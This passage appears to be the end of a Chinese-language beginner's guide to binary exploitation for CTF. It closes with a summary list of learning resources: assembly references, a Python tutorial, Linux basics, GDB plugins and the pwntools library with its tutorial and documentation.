https://github.com/Gallopsled/pwntools. 关于这个库的使用可以参考一下这篇教程: https://bbs.pediy.com/thread-247217.htm 164 | 165 | 总结一下: 166 | 167 | 1. 汇编语言 168 | 1. 在线网站: https://godbolt.org/ 169 | 2. 书籍: <<汇编语言>> 王爽 170 | 2. python入门教程 171 | 1. https://www.runoob.com/python/python-tutorial.html 172 | 3. linux基本操作 173 | 1. https://zhuanlan.zhihu.com/p/36801617 174 | 4. gdb插件 175 | 1. gef, peda, pwndbg 176 | 5. pwntools 177 | 1. 入门教程: https://bbs.pediy.com/thread-247217.htm 178 | 2. 官网: https://github.com/Gallopsled/pwntools 179 | 3. 官方文档: http://docs.pwntools.com/en/stable/ --------------------------------------------------------------------------------